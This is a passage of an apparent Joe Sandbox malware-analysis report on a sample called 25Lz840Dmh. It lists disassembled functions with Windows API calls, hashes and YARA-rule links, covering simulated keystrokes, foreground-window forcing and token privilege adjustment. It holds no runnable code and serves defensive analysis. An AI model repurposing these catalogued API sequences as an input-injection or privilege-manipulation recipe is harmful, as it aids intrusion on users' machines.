                                                  • Instruction Fuzzy Hash: C6F01C71501715CFCB389F64D494827BBE1FF5432531089BEE2E683620C7319888EB40
                                                  Function 00C10791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C107B0
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  • Opcode ID: dfd4b381f8dbd9744031b9f1cd3200f436e343cf5d8dd1e49b65ae5d4778c1de
                                                  • Instruction ID: 3ee5b813016989e38432eaa9c3e6acc2ea67b75db2ea30738167cbaf9c54047b
                                                  • Opcode Fuzzy Hash: dfd4b381f8dbd9744031b9f1cd3200f436e343cf5d8dd1e49b65ae5d4778c1de
                                                  • Instruction Fuzzy Hash: 5CE0863694412857C720A6599C09FEA77DDDB896A0F0441F5FD0CD7215D9609C808690
                                                  Function 00C58E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock
                                                  • String ID:
                                                  • API String ID: 2638373210-0
                                                  • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                  • Instruction ID: 0d43eb94d1d9781d92a9a7eb014aad63a69a009628d66780fcc2ebdc11e21948
                                                  • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                  • Instruction Fuzzy Hash: FAE092B4204B009FD7398A24D801BE373E1EB06305F00081DF6AA93241EBA27889975D
                                                  Function 022808E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?), ref: 022808EB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                  • Instruction ID: 11f04f1428fa7dbc78be1997d8d18824ce82eaed62d2d8261b91abc774101426
                                                  • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                  • Instruction Fuzzy Hash: DEE08C71A2620CEBEB20EBF88808AA973A8DB04320F004654E81AC32C4D630CB48D654
                                                  Function 00BF5C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00C2DD42,?,?,00000000), ref: 00BF5C5F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 12978dd5cfac6b9f4633d253eb2cb841dda0d1c43e164c4ca4eb857e3d7d1178
                                                  • Instruction ID: e86bba0969c46f86870608e190f2ea3c9093a521968e8dcecc43a58d37e472eb
                                                  • Opcode Fuzzy Hash: 12978dd5cfac6b9f4633d253eb2cb841dda0d1c43e164c4ca4eb857e3d7d1178
                                                  • Instruction Fuzzy Hash: 9AD0C77464020CBFEB10DB80DC47FAD777CE705710F500194FD0456690D6B27D508795
                                                  Function 022808B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?), ref: 022808BB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                  • Instruction ID: 2059fefdb9b0ebf8beeb323a013b8762c8f53f4b9a92b92abdccc1c57bd64e40
                                                  • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                  • Instruction Fuzzy Hash: 7FD05E3091720CABCB10DAE49804A9A73A89B04320F004754ED15932C0D6719A849790
                                                  Function 00C1525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction ID: 889f672530e04a0bba9a18b4aa2273ed2eef5ff91d31c9f0732076d3b544274c
                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction Fuzzy Hash: B2B0927A44020CBBCE012A82EC02A893B199B92764F408020FB0C18162A677A6A4AA89
                                                  Function 00C31DE4 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00C31DF0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: PathTemp
                                                  • String ID:
                                                  • API String ID: 2920410445-0
                                                  • Opcode ID: aa4f8066592d34fb9a81ff2b600726c0376265674145cc026adcb1b21134f6e2
                                                  • Instruction ID: 40a08582f823283bc29bed2c0d9c1ac5c02ce7118ceb57a8943d74ca75fa07b2
                                                  • Opcode Fuzzy Hash: aa4f8066592d34fb9a81ff2b600726c0376265674145cc026adcb1b21134f6e2
                                                  • Instruction Fuzzy Hash: F0C04C714600199FD715A754CCD5BB8723CAB01701F14409575459105195B01BC5DE21
                                                  Function 00C5D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000002,00000000), ref: 00C5D1FF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: a2448919bce778d4d0cdf9ddd4678eca9bf49945401792216083840a02ffc56d
                                                  • Instruction ID: de16f12ec04b4c3f2889e413cab3ba28b38076535b699f15536cac027587630c
                                                  • Opcode Fuzzy Hash: a2448919bce778d4d0cdf9ddd4678eca9bf49945401792216083840a02ffc56d
                                                  • Instruction Fuzzy Hash: 427172342047058FC724EF24C891A6EB7E0AF89350F04496DF9969B3A2DB30ED8DCB56
                                                  Function 00C10C08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: e39615d50433a17d1ae4429e19a4b22a20e83360f91d3b50e616f6398c405942
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: FA31C770A001059BC718DF59C4A49A9FBA5FB5A300B748695E41ACB351D671EEC1EFC1
                                                  Function 022822CC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 022822E1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                  • Instruction ID: 2484464b5620cca87c410a96e0e217f0797a8593d40ac702d70778680448e9be
                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                  • Instruction Fuzzy Hash: 07E0BF7494110EEFDB10EFE4D5496DE7BB4EF04301F1006A1FD05D7684DB709E549A62
                                                  Function 022822D0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 022822E1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction ID: 57ff05d6831cfef332f62ebd96e8e4b9bb437bbe0cbad408adadb627ba48674c
                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction Fuzzy Hash: A1E0E67494110EDFDB00EFF4D54969E7FB4EF04301F100261FD01D2684DB709D509A62

                                                  Non-executed Functions

                                                  Function 00C7CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C7CB37
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C7CB95
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C7CBD6
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C7CC00
                                                  • SendMessageW.USER32 ref: 00C7CC29
                                                  • _wcsncpy.LIBCMT ref: 00C7CC95
                                                  • GetKeyState.USER32(00000011), ref: 00C7CCB6
                                                  • GetKeyState.USER32(00000009), ref: 00C7CCC3
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C7CCD9
                                                  • GetKeyState.USER32(00000010), ref: 00C7CCE3
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C7CD0C
                                                  • SendMessageW.USER32 ref: 00C7CD33
                                                  • SendMessageW.USER32(?,00001030,?,00C7B348), ref: 00C7CE37
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C7CE4D
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C7CE60
                                                  • SetCapture.USER32(?), ref: 00C7CE69
                                                  • ClientToScreen.USER32(?,?), ref: 00C7CECE
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C7CEDB
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C7CEF5
                                                  • ReleaseCapture.USER32 ref: 00C7CF00
                                                  • GetCursorPos.USER32(?), ref: 00C7CF3A
                                                  • ScreenToClient.USER32(?,?), ref: 00C7CF47
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C7CFA3
                                                  • SendMessageW.USER32 ref: 00C7CFD1
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C7D00E
                                                  • SendMessageW.USER32 ref: 00C7D03D
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C7D05E
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C7D06D
                                                  • GetCursorPos.USER32(?), ref: 00C7D08D
                                                  • ScreenToClient.USER32(?,?), ref: 00C7D09A
                                                  • GetParent.USER32(?), ref: 00C7D0BA
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C7D123
                                                  • SendMessageW.USER32 ref: 00C7D154
                                                  • ClientToScreen.USER32(?,?), ref: 00C7D1B2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C7D1E2
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C7D20C
                                                  • SendMessageW.USER32 ref: 00C7D22F
                                                  • ClientToScreen.USER32(?,?), ref: 00C7D281
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C7D2B5
                                                    • Part of subcall function 00BF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BF25EC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C7D351
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 3977979337-4164748364
                                                  • Opcode ID: b05e9ecb65bb35193086fd5d23c08234b5615b577192d5c8f0f19ae3a1e59dde
                                                  • Instruction ID: a8823ade40cd9207396e5364e6fecf6f83d7853c645d7d292c94a5c9b644cfe5
                                                  • Opcode Fuzzy Hash: b05e9ecb65bb35193086fd5d23c08234b5615b577192d5c8f0f19ae3a1e59dde
                                                  • Instruction Fuzzy Hash: 5042CC74204242AFDB21CF69C884BAABBF5FF48310F14861DF6A9972B1C731D985DB52
                                                  Function 00C06F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove$_memset
                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                  • API String ID: 1357608183-1798697756
                                                  • Opcode ID: 37953a6a740402af9561937f6bff1e5ed95988cb909c37c0570fee41d809a136
                                                  • Instruction ID: 29ba9255c509dfd3aa91eeac4b8a861ff0c737819a3e7a3e8520c4fc6d730a6a
                                                  • Opcode Fuzzy Hash: 37953a6a740402af9561937f6bff1e5ed95988cb909c37c0570fee41d809a136
                                                  • Instruction Fuzzy Hash: F593A271E04219DFDB28CF98C881BADB7B1FF48310F25816AE955EB291E7709E81DB50
                                                  Function 00BF48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32(00000000,?), ref: 00BF48DF
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C2D665
                                                  • IsIconic.USER32(?), ref: 00C2D66E
                                                  • ShowWindow.USER32(?,00000009), ref: 00C2D67B
                                                  • SetForegroundWindow.USER32(?), ref: 00C2D685
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C2D69B
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C2D6A2
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C2D6AE
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C2D6BF
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C2D6C7
                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C2D6CF
                                                  • SetForegroundWindow.USER32(?), ref: 00C2D6D2
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2D6E7
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C2D6F2
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2D6FC
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C2D701
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2D70A
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C2D70F
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C2D719
                                                  • keybd_event.USER32(00000012,00000000), ref: 00C2D71E
                                                  • SetForegroundWindow.USER32(?), ref: 00C2D721
                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 00C2D748
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: 197a57f91a57b082f9263eda519530af1073d2ea3af745231a997f2b1a615b9a
                                                  • Instruction ID: a3fcfe506de6b75b7d834ce52bfb02f302e4087d77b36da9efb98d96db9e0dc1
                                                  • Opcode Fuzzy Hash: 197a57f91a57b082f9263eda519530af1073d2ea3af745231a997f2b1a615b9a
                                                  • Instruction Fuzzy Hash: 10318C71A40318BBEB206F619CC9F7F7F6CEB54B50F104029FA05EA1D1C6B05D41ABA1
                                                  Function 00C48310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C487E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C4882B
                                                    • Part of subcall function 00C487E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C48858
                                                    • Part of subcall function 00C487E1: GetLastError.KERNEL32 ref: 00C48865
                                                  • _memset.LIBCMT ref: 00C48353
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C483A5
                                                  • CloseHandle.KERNEL32(?), ref: 00C483B6
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C483CD
                                                  • GetProcessWindowStation.USER32 ref: 00C483E6
                                                  • SetProcessWindowStation.USER32(00000000), ref: 00C483F0
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C4840A
                                                    • Part of subcall function 00C481CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C48309), ref: 00C481E0
                                                    • Part of subcall function 00C481CB: CloseHandle.KERNEL32(?,?,00C48309), ref: 00C481F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                  • String ID: $default$winsta0
                                                  • API String ID: 2063423040-1027155976
                                                  • Opcode ID: 6943fd4d42edd05d74c98ec8aeaa1c18a5416328be8446b2c75ff9f7c3b23ab1
                                                  • Instruction ID: 2a03d4d6ca57db8c8e14ec4418420459b48039855cf647a04ee64d147f0fad21
                                                  • Opcode Fuzzy Hash: 6943fd4d42edd05d74c98ec8aeaa1c18a5416328be8446b2c75ff9f7c3b23ab1
                                                  • Instruction Fuzzy Hash: CB815C71900209AFEF11EFA4DC85BEE7BB9FF04704F144169F924A6261DB358E59EB20
                                                  Function 00C5C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C5C78D
                                                  • FindClose.KERNEL32(00000000), ref: 00C5C7E1
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C5C806
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C5C81D
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C5C844
                                                  • __swprintf.LIBCMT ref: 00C5C890
                                                  • __swprintf.LIBCMT ref: 00C5C8D3
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • __swprintf.LIBCMT ref: 00C5C927
                                                    • Part of subcall function 00C13698: __woutput_l.LIBCMT ref: 00C136F1
                                                  • __swprintf.LIBCMT ref: 00C5C975
                                                    • Part of subcall function 00C13698: __flsbuf.LIBCMT ref: 00C13713
                                                    • Part of subcall function 00C13698: __flsbuf.LIBCMT ref: 00C1372B
                                                  • __swprintf.LIBCMT ref: 00C5C9C4
                                                  • __swprintf.LIBCMT ref: 00C5CA13
                                                  • __swprintf.LIBCMT ref: 00C5CA62
                                                  Strings
                                                  Memory Dump Source
